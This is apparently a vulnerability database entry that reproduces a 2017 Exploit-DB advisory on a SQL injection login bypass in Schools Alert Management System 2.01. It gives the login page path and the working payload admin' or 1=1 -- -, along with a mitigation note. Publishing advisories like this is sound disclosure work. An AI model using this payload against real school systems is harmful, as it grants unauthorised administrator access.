Schools Alert Management - SQL injection login bypass

vendor:

Schools Alert Management System

by:

Ali BawazeEer

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: Schools Alert Management System

Affected Version From: 2.01

Affected Version To: 2.01

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 64bit/Mozilla Firefox

2017

Schools Alert Management – SQL injection login bypass

An attacker is able to inject malicious SQL query to bypass the login page and login as admin of the particular school. The attacker can set the username and password to 'admin' or 1=1 -- - and select the check box as management.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<!-- 
# Exploit Title:  Schools Alert Management - SQL injection login bypass 
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
# Version: 2.01
# Category: Webapps
# Tested on: windows64bit / mozila firefox 
# 
#
--!>

# ========================================================
#
#
# Schools Alert Management - SQL injection login bypass 
# 
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
# 
# Proof of Concept : - 
# 
# http://localhost/schoolalert/demo_school_name/schools_login.php  [ set username and password ] to >>  admin' or 1=1 -- - 
#  you must choose the check box as management 
#   
# 
# 
#
# Risk : authenticated attacker maybe starting posting item in the site or compromise the site 
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #